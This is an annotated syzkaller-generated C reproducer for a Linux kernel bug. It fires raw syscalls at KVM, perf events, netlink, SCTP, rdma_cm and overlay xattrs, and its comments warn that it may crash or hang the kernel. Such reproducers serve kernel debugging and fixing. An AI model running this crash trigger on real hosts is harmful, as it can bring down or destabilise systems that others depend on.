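// https://syzkaller.appspot.com/bug?id=90cd06695bd4650a5228385b4b02f370ef9c219f
// autogenerated by syzkaller (https://github.com/google/syzkaller)
//
// NOTE(review): this program exists to trigger a kernel bug (the syzkaller
// report linked above). Everything it does -- opening /dev/kvm and issuing
// vcpu ioctls, perf_event_open, raw netlink/SCTP/rdma_cm traffic, setxattr of
// "trusted.overlay.opaque", clone() with unusual flags -- is aimed at the
// kernel, not at any user-space result. Run it only inside a disposable VM
// booted with the kernel under test, never on a workstation or a shared host;
// expect a crash, a hang or a tainted kernel. Most return values are
// deliberately ignored: syzkaller reproducers preserve the exact syscall
// order and arguments regardless of intermediate failures.
//
// The include list was garbled in transit (bare "#include" lines); it is
// restored here from the names the code actually uses: htobe16/htobe32
// (endian.h), open/O_RDWR (fcntl.h), uintN_t (stdint.h), sprintf/perror
// (stdio.h), memcpy/strncpy/strchr/memset (string.h), __NR_* (sys/syscall.h),
// syscall (unistd.h), plus the stdlib/sys/types/sys/stat headers that the
// syzkaller template always emits.
#define _GNU_SOURCE

#include <endian.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

/* Mask of bf_len low bits, as `type`. bf_len must be < 64. */
#define BITMASK_LEN(type, bf_len) (type)((1ull << (bf_len)) - 1)
/* Same mask shifted up to bit offset bf_off. */
#define BITMASK_LEN_OFF(type, bf_off, bf_len) \
  (type)(BITMASK_LEN(type, (bf_len)) << (bf_off))

/*
 * Store `val` into the bit-field [bf_off, bf_off + bf_len) of the `type`
 * object at `addr`, leaving the other bits untouched. (0, 0) means "whole
 * object". Wrapped in do/while(0) so a call followed by `;` is a single
 * statement and cannot pair with an outer `else` (the original if/else
 * form had a dangling-else hazard).
 */
#define STORE_BY_BITMASK(type, addr, val, bf_off, bf_len)                  \
  do {                                                                     \
    if ((bf_off) == 0 && (bf_len) == 0) {                                  \
      *(type*)(addr) = (type)(val);                                        \
    } else {                                                               \
      type new_val = *(type*)(addr);                                       \
      new_val &= ~BITMASK_LEN_OFF(type, (bf_off), (bf_len));               \
      new_val |= ((type)(val)&BITMASK_LEN(type, (bf_len))) << (bf_off);    \
      *(type*)(addr) = new_val;                                            \
    }                                                                      \
  } while (0)

/*
 * syzkaller's open-a-device pseudo-syscall.
 *
 * a0 == 0xc / 0xb: open "/dev/char/MAJ:MIN" or "/dev/block/MAJ:MIN" with
 *   O_RDWR, where MAJ/MIN are the low 8 bits of a1/a2.
 * otherwise: a0 is a pointer to a path template; every '#' is replaced by
 *   successive decimal digits of a1 (least significant first) and the
 *   result is opened with flags a2.
 *
 * Returns the open() result (-1 with errno on failure).
 * NOTE(review): for negative a1 `a1 % 10` is negative and yields a byte
 * below '0'; callers here pass 6 and 7, so the original behaviour is kept.
 */
static long syz_open_dev(long a0, long a1, long a2)
{
  if (a0 == 0xc || a0 == 0xb) {
    char buf[128];
    /* Longest output is "/dev/block/255:255" (18 chars); snprintf keeps the
     * write bounded regardless. */
    snprintf(buf, sizeof(buf), "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block",
             (uint8_t)a1, (uint8_t)a2);
    return open(buf, O_RDWR, 0);
  }

  char buf[1024];
  char* hash;
  /* strncpy does not terminate on truncation; the explicit NUL below does. */
  strncpy(buf, (char*)a0, sizeof(buf) - 1);
  buf[sizeof(buf) - 1] = 0;
  while ((hash = strchr(buf, '#'))) {
    *hash = '0' + (char)(a1 % 10);
    a1 /= 10;
  }
  return open(buf, a2, 0);
}

/*
 * Resources harvested from earlier calls and fed into later ones.
 * 0xffffffffffffffff (-1) marks "not obtained", so a later call sees an
 * invalid fd rather than garbage. r[5] (an SCTP association id read back
 * from getsockopt) and r[6] (the pid) default to 0.
 */
uint64_t r[8] = {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff,
                 0xffffffffffffffff, 0xffffffffffffffff, 0x0,
                 0x0,                0xffffffffffffffff};

int main(void)
{
  long res = 0;

  /*
   * Fixed 16 MiB scratch arena at 0x20000000 (PROT_READ|PROT_WRITE,
   * MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS on x86-64). Every address literal
   * below points into it. If the mapping fails, the first store would
   * SIGSEGV with no diagnostic, so bail out explicitly instead.
   */
  res = syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
  if (res == -1) {
    perror("mmap(0x20000000)");
    return 1;
  }

  /* --- KVM: open /dev/kvm, create a VM and a vcpu, issue a vcpu ioctl ---
   * 0xffffffffffffff9c is AT_FDCWD; 0xae01/0xae41 are _IO(KVMIO, 0x01/0x41),
   * i.e. KVM_CREATE_VM / KVM_CREATE_VCPU. 0xc080aebe is _IOWR(KVMIO, 0xbe)
   * with a 0x80-byte argument (presumably KVM_GET_NESTED_STATE -- verify
   * against the target kernel's uapi). */
  memcpy((void*)0x20000080, "/dev/kvm", 9);
  res = syscall(__NR_openat, 0xffffffffffffff9c, 0x20000080, 0, 0);
  if (res != -1)
    r[0] = res;
  res = syscall(__NR_ioctl, r[0], 0xae01, 0);
  if (res != -1)
    r[1] = res;
  res = syscall(__NR_ioctl, r[1], 0xae41, 0);
  if (res != -1)
    r[2] = res;
  syscall(__NR_ioctl, r[2], 0xc080aebe, 0x20000100);

  /* clone with an unusual flag word and a bogus child-stack pointer;
   * then SCHED_IDLE (policy 5) and a prctl (option 0xb) -- all fire-and-forget. */
  syscall(__NR_clone, 0x802102001ffc, 0, 0x9999999999999999, 0x20000040, -1);
  *(uint32_t*)0x200000c0 = 0xfffffffe;
  syscall(__NR_sched_setscheduler, 0, 5, 0x200000c0);
  syscall(__NR_prctl, 0xb, 0x20000080);

  /* --- netlink: socket(AF_NETLINK=0x10, SOCK_RAW=3, proto 0x10) and one
   * sendmsg carrying a 0x14-byte message of type 0x28, flags 0xb01. --- */
  res = syscall(__NR_socket, 0x10, 3, 0x10);
  if (res != -1)
    r[3] = res;
  *(uint64_t*)0x20000100 = 0x20000040; /* msg_name -> sockaddr_nl */
  *(uint16_t*)0x20000040 = 0x10;
  *(uint16_t*)0x20000042 = 0xfff0;
  *(uint32_t*)0x20000044 = 0;
  *(uint32_t*)0x20000048 = 0;
  *(uint32_t*)0x20000108 = 0xc;        /* msg_namelen */
  *(uint64_t*)0x20000110 = 0x200000c0; /* msg_iov */
  *(uint64_t*)0x200000c0 = 0x20000080; /* iov_base -> nlmsghdr */
  *(uint32_t*)0x20000080 = 0x14;       /* nlmsg_len */
  *(uint16_t*)0x20000084 = 0x28;       /* nlmsg_type */
  *(uint16_t*)0x20000086 = 0xb01;      /* nlmsg_flags */
  *(uint32_t*)0x20000088 = 0;
  *(uint32_t*)0x2000008c = 0;
  *(uint8_t*)0x20000090 = 6;
  *(uint8_t*)0x20000091 = 0;
  *(uint16_t*)0x20000092 = 0;
  *(uint64_t*)0x200000c8 = 0x165;      /* iov_len (larger than the message) */
  *(uint64_t*)0x20000118 = 1;          /* msg_iovlen */
  *(uint64_t*)0x20000120 = 0;
  *(uint64_t*)0x20000128 = 0;
  *(uint32_t*)0x20000130 = 0;
  syscall(__NR_sendmsg, r[3], 0x20000100, 0);

  /* A 0x52-byte record written to fd -1: the write fails (EBADF) but the
   * buffer contents are reused by nothing later; kept for fidelity. */
  *(uint32_t*)0x20000140 = 0x52;
  *(uint8_t*)0x20000144 = 0x7d;
  *(uint16_t*)0x20000145 = 1;
  *(uint16_t*)0x20000147 = 0;
  *(uint16_t*)0x20000149 = 0x4b;
  *(uint16_t*)0x2000014b = 0xfff9;
  *(uint32_t*)0x2000014d = 3;
  *(uint8_t*)0x20000151 = 0;
  *(uint32_t*)0x20000152 = 1;
  *(uint64_t*)0x20000156 = 1;
  *(uint32_t*)0x2000015e = 0x1000000;
  *(uint32_t*)0x20000162 = 3;
  *(uint32_t*)0x20000166 = 8;
  *(uint64_t*)0x2000016a = 7;
  *(uint16_t*)0x20000172 = 8;
  memcpy((void*)0x20000174, "+ppp1+%{", 8);
  *(uint16_t*)0x2000017c = 0xd;
  memcpy((void*)0x2000017e, "nodeveth0em0)", 13);
  *(uint16_t*)0x2000018b = 0;
  *(uint16_t*)0x2000018d = 3;
  memcpy((void*)0x2000018f, "lo/", 3);
  syscall(__NR_write, -1, 0x20000140, 0x52);

  /* --- perf_event_open #1: type 1 (PERF_TYPE_SOFTWARE), size 0x70,
   * config 0x7c0000, sample_period 0x7f. The flag word at +0x28 is written
   * field by field; net value is bit 5 | bit 10 (exclude_kernel | freq in
   * the uapi layout -- the macro masks 3 and 0x1f down to one bit each). --- */
  *(uint32_t*)0x2001d000 = 1;
  *(uint32_t*)0x2001d004 = 0x70;
  *(uint8_t*)0x2001d008 = 0;
  *(uint8_t*)0x2001d009 = 0;
  *(uint8_t*)0x2001d00a = 0x7c;
  *(uint8_t*)0x2001d00b = 0;
  *(uint32_t*)0x2001d00c = 0;
  *(uint64_t*)0x2001d010 = 0x7f;
  *(uint64_t*)0x2001d018 = 0;
  *(uint64_t*)0x2001d020 = 0;
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 0, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 1, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 2, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 3, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 4, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 3, 5, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 6, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 7, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 8, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 9, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0x1f, 10, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 11, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 12, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 13, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 14, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 15, 2);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 17, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 18, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 19, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 20, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 21, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 22, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 23, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 24, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 25, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 26, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 27, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 28, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 29, 35);
  /* remaining attr fields (+0x30 .. +0x6f, 64 bytes) are all zero */
  memset((void*)0x2001d030, 0, 0x40);
  syscall(__NR_perf_event_open, 0x2001d000, 0, 0, -1, 0);

  /* second /dev/kvm open (result dropped) and a vcpu ioctl on fd -1 */
  memcpy((void*)0x20000080, "/dev/kvm", 9);
  syscall(__NR_openat, 0xffffffffffffff9c, 0x20000080, 0, 0);
  syscall(__NR_ioctl, -1, 0xae41, 0);

  /* socket(family 3, type 0x7fe, 0) then SOL_SOCKET(1) / SO_BINDTODEVICE(0x19) */
  res = syscall(__NR_socket, 3, 0x7fe, 0);
  if (res != -1)
    r[4] = res;
  syscall(__NR_getsockopt, r[4], 1, 0x19, 0x20000080, 0x10);
  memcpy((void*)0x200003c0, "./file0", 8);
  syscall(__NR_stat, 0x200003c0, 0x20000400);
  syscall(__NR_ioctl, -1, 0xae41, 3);

  /* SO_BINDTODEVICE on fd -1 with "veth1" (plus trailing junk bytes) and
   * "veth1_to_bond"; both fail with EBADF. */
  memcpy((void*)0x200015c0,
         "\x76\x65\x74\x68\x31\x00\x00\x00\x00\xff\xff\xff\xff\xff\xef\x00", 16);
  syscall(__NR_setsockopt, -1, 1, 0x19, 0x200015c0, 0xb);
  syscall(__NR_dup2, -1, -1);
  memcpy((void*)0x20000040,
         "\x76\x65\x74\x68\x31\x5f\x74\x6f\x5f\x62\x6f\x6e\x64\x00\x00\x00", 16);
  syscall(__NR_setsockopt, -1, 1, 0x19, 0x20000040, 0x10);

  /* sockaddr_in (AF_INET=2) with a huge negative length passed to sendto(-1) */
  *(uint16_t*)0x20000000 = 2;
  *(uint16_t*)0x20000002 = htobe16(0);
  *(uint32_t*)0x20000004 = htobe32(0);
  *(uint8_t*)0x20000008 = 0;
  *(uint8_t*)0x20000009 = 0xe8;
  memset((void*)0x2000000a, 0, 6);
  syscall(__NR_sendto, -1, 0x20000000, 0xfffffffffffffe4e, 0xc0, 0x20000000, 0);

  /* /dev/dsp7 with flags 0x4080 */
  memcpy((void*)0x20000000, "/dev/dsp#", 10);
  syz_open_dev(0x20000000, 7, 0x4080);

  /* rt_sigprocmask(SIG_BLOCK=0, mask, NULL, 8) */
  *(uint64_t*)0x20039ff8 = 0xfffffffffffffffa;
  syscall(__NR_rt_sigprocmask, 0, 0x20039ff8, 0, 8);

  /* getsockopt(-1, SOL_SCTP=0x84, optname 2, buf, &len=8) */
  *(uint32_t*)0x20000100 = 8;
  syscall(__NR_getsockopt, -1, 0x84, 2, 0x200000c0, 0x20000100);

  /* --- perf_event_open #2: config 0, flag word = bit 5 only (0x81 & 1),
   * sample/bp address field at +0x38 = 0x20abe000 (inside the arena but
   * never dereferenced here), group fd -1. --- */
  *(uint32_t*)0x2001d000 = 1;
  *(uint32_t*)0x2001d004 = 0x70;
  *(uint8_t*)0x2001d008 = 0;
  *(uint8_t*)0x2001d009 = 0;
  *(uint8_t*)0x2001d00a = 0;
  *(uint8_t*)0x2001d00b = 0;
  *(uint32_t*)0x2001d00c = 0;
  *(uint64_t*)0x2001d010 = 0x7f;
  *(uint64_t*)0x2001d018 = 0;
  *(uint64_t*)0x2001d020 = 0;
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 0, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 1, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 2, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 3, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 4, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0x81, 5, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 6, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 7, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 8, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 9, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 10, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 11, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 12, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 13, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 14, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 15, 2);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 17, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 18, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 19, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 20, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 21, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 22, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 23, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 24, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 25, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 26, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 27, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 28, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 29, 35);
  memset((void*)0x2001d030, 0, 0x40);
  *(uint64_t*)0x2001d038 = 0x20abe000;
  syscall(__NR_perf_event_open, 0x2001d000, 0, -1, -1, 0);

  /* --- SCTP getsockopt(-1, SOL_SCTP=0x84, 0x6f) with an address list of
   * four sockaddrs (in6 fe80::1b, in 255.255.255.255, in6 fe80::1f,
   * in6 ff01::1); 0x6f = 111 appears to be SCTP_SOCKOPT_CONNECTX3, whose
   * first u32 is the association id read back into r[5]. --- */
  *(uint32_t*)0x200001c0 = 0;
  *(uint32_t*)0x200001c4 = 0x64;
  *(uint64_t*)0x200001c8 = 0x20000140;
  *(uint16_t*)0x20000140 = 0xa; /* AF_INET6 */
  *(uint16_t*)0x20000142 = htobe16(0x4e24);
  *(uint32_t*)0x20000144 = 0xffffff00;
  *(uint8_t*)0x20000148 = 0xfe;
  *(uint8_t*)0x20000149 = 0x80;
  memset((void*)0x2000014a, 0, 13);
  *(uint8_t*)0x20000157 = 0x1b;
  *(uint32_t*)0x20000158 = 6;
  *(uint16_t*)0x2000015c = 2; /* AF_INET */
  *(uint16_t*)0x2000015e = htobe16(0x4e21);
  *(uint32_t*)0x20000160 = htobe32(-1);
  memset((void*)0x20000164, 0, 8);
  *(uint16_t*)0x2000016c = 0xa;
  *(uint16_t*)0x2000016e = htobe16(0x4e22);
  *(uint32_t*)0x20000170 = 0xfffffe00;
  *(uint8_t*)0x20000174 = 0xfe;
  *(uint8_t*)0x20000175 = 0x80;
  memset((void*)0x20000176, 0, 13);
  *(uint8_t*)0x20000183 = 0x1f;
  *(uint32_t*)0x20000184 = 0x20;
  *(uint16_t*)0x20000188 = 0xa;
  *(uint16_t*)0x2000018a = htobe16(0x4e24);
  *(uint32_t*)0x2000018c = 6;
  *(uint8_t*)0x20000190 = -1;
  *(uint8_t*)0x20000191 = 1;
  memset((void*)0x20000192, 0, 13);
  *(uint8_t*)0x2000019f = 1;
  *(uint32_t*)0x200001a0 = 6;
  *(uint32_t*)0x20000200 = 0x10;
  res = syscall(__NR_getsockopt, -1, 0x84, 0x6f, 0x200001c0, 0x20000200);
  if (res != -1)
    r[5] = *(uint32_t*)0x200001c0;

  /* setsockopt(-1, SOL_SCTP, 0x22) carrying the harvested assoc id */
  *(uint16_t*)0x20000240 = 0;
  *(uint16_t*)0x20000242 = 1;
  *(uint32_t*)0x20000244 = 7;
  *(uint32_t*)0x20000248 = 7;
  *(uint32_t*)0x2000024c = r[5];
  syscall(__NR_setsockopt, -1, 0x84, 0x22, 0x20000240, 0x10);
  syscall(__NR_socket, 0x10, 3, 0x10);

  /* setxattr("./file0", "trusted.overlay.opaque", "y", size -25, flags
   * 0x400000000000003): trusted.* xattrs are normally CAP_SYS_ADMIN-only,
   * and overlayfs treats this one specially -- part of the kernel-facing
   * probe, not something to "fix". */
  memcpy((void*)0x20000000, "./file0", 8);
  memcpy((void*)0x20000100, "trusted.overlay.opaque", 23);
  memcpy((void*)0x20000140, "y", 2);
  syscall(__NR_setxattr, 0x20000000, 0x20000100, 0x20000140,
          0xffffffffffffffe7, 0x400000000000003);

  *(uint32_t*)0x20000200 = 0;
  *(uint32_t*)0x20000204 = 0;
  *(uint32_t*)0x20000208 = 0xfffffffc;
  *(uint32_t*)0x2000020c = 0;
  *(uint32_t*)0x20000210 = 0;
  *(uint32_t*)0x20000214 = 2;
  syscall(__NR_clone, 0x802102001ffc, 0, 0x9999999999999999, 0x20000040, -1);

  /* process_vm_writev into our own pid: 1 local iov (0x20000240, 0x1000)
   * from 3 remote iovs -- all inside the arena. */
  res = syscall(__NR_getpid);
  if (res != -1)
    r[6] = res;
  syscall(__NR_getgid);
  *(uint64_t*)0x20000080 = 0x20000240;
  *(uint64_t*)0x20000088 = 0x1000;
  *(uint64_t*)0x200001c0 = 0x200000c0;
  *(uint64_t*)0x200001c8 = 0x85;
  *(uint64_t*)0x200001d0 = 0x20001240;
  *(uint64_t*)0x200001d8 = 0xc2;
  *(uint64_t*)0x200001e0 = 0x20000180;
  *(uint64_t*)0x200001e8 = 0x3b;
  syscall(__NR_process_vm_writev, r[6], 0x20000080, 1, 0x200001c0, 3, 0);

  /* --- rdma_cm: open /dev/infiniband/rdma_cm (fd dropped), then two
   * ucma command writes. The first goes to fd 0xffffff9c (int -100, so it
   * fails and r[7] keeps its -1 default); the second goes to fd -1. --- */
  memcpy((void*)0x20001500, "/dev/infiniband/rdma_cm", 24);
  syscall(__NR_openat, 0xffffffffffffff9c, 0x20001500, 2, 0);
  *(uint32_t*)0x20001400 = 0;
  *(uint16_t*)0x20001404 = 0x18;
  *(uint16_t*)0x20001406 = 0xfa00;
  *(uint64_t*)0x20001408 = 4;
  *(uint64_t*)0x20001410 = 0x200013c0;
  *(uint16_t*)0x20001418 = 0x13f;
  *(uint8_t*)0x2000141a = 5;
  memset((void*)0x2000141b, 0, 5);
  res = syscall(__NR_write, 0xffffff9c, 0x20001400, 0x20);
  if (res != -1)
    r[7] = *(uint32_t*)0x200013c0;
  *(uint32_t*)0x20001440 = 0x16;
  *(uint16_t*)0x20001444 = 0x98;
  *(uint16_t*)0x20001446 = 0xfa00;
  *(uint64_t*)0x20001448 = 0x20001380;
  *(uint64_t*)0x20001450 = 2;
  *(uint32_t*)0x20001458 = r[7];
  *(uint16_t*)0x2000145c = 0x1c;
  *(uint16_t*)0x2000145e = 1;
  *(uint16_t*)0x20001460 = 2;
  *(uint16_t*)0x20001462 = htobe16(0x4e22);
  *(uint32_t*)0x20001464 = htobe32(0);
  memset((void*)0x20001468, 0, 8);
  syscall(__NR_write, -1, 0x20001440, 0xa0);

  /* --- perf_event_open #3: as #1 but config 0xf50000 --- */
  *(uint32_t*)0x2001d000 = 1;
  *(uint32_t*)0x2001d004 = 0x70;
  *(uint8_t*)0x2001d008 = 0;
  *(uint8_t*)0x2001d009 = 0;
  *(uint8_t*)0x2001d00a = 0xf5;
  *(uint8_t*)0x2001d00b = 0;
  *(uint32_t*)0x2001d00c = 0;
  *(uint64_t*)0x2001d010 = 0x7f;
  *(uint64_t*)0x2001d018 = 0;
  *(uint64_t*)0x2001d020 = 0;
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 0, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 1, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 2, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 3, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 4, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 3, 5, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 6, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 7, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 8, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 9, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0x1f, 10, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 11, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 12, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 13, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 14, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 15, 2);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 17, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 18, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 19, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 20, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 21, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 22, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 23, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 24, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 25, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 26, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 27, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 28, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 29, 35);
  memset((void*)0x2001d030, 0, 0x40);
  syscall(__NR_perf_event_open, 0x2001d000, 0, 0, -1, 0);

  /* getsockopt(-1, SOL_SOCKET, 0x11 = SO_PEERCRED, buf, &len=0xc) */
  *(uint32_t*)0x20000300 = 0xc;
  syscall(__NR_getsockopt, -1, 1, 0x11, 0x20000240, 0x20000300);
  memcpy((void*)0x200003c0, "./file0", 8);
  syscall(__NR_stat, 0x200003c0, 0x20000400);

  /* /dev/midi6 with flags 0x200 */
  memcpy((void*)0x20000100, "/dev/midi#", 11);
  syz_open_dev(0x20000100, 6, 0x200);

  /* sendto(-1) with a sockaddr_in for 172.20.20.30:0x4e23 placed near the
   * top of the arena (0x20e68000 < 0x21000000, still mapped) */
  *(uint16_t*)0x20e68000 = 2;
  *(uint16_t*)0x20e68002 = htobe16(0x4e23);
  *(uint8_t*)0x20e68004 = 0xac;
  *(uint8_t*)0x20e68005 = 0x14;
  *(uint8_t*)0x20e68006 = 0x14;
  *(uint8_t*)0x20e68007 = 0x1e;
  memset((void*)0x20e68008, 0, 8);
  syscall(__NR_sendto, -1, 0x20000000, 0xffffffffffffff5c, 0x200007fe,
          0x20e68000, 0x10);

  memcpy((void*)0x200015c0,
         "\x76\x65\x74\x68\x31\x00\x00\x00\x00\xff\xff\xff\xff\xff\xef\x00", 16);
  syscall(__NR_setsockopt, -1, 1, 0x19, 0x200015c0, 0xb);
  syscall(__NR_dup2, -1, -1);

  /* timer_settime(timer 0, flags 0): itimerspec {interval 0x77359400 s,
   * value 0xe4c ns}; old-value pointer 0x20040000 is inside the arena. */
  *(uint64_t*)0x20000040 = 0x77359400;
  *(uint64_t*)0x20000048 = 0;
  *(uint64_t*)0x20000050 = 0;
  *(uint64_t*)0x20000058 = 0xe4c;
  syscall(__NR_timer_settime, 0, 0, 0x20000040, 0x20040000);
  return 0;
}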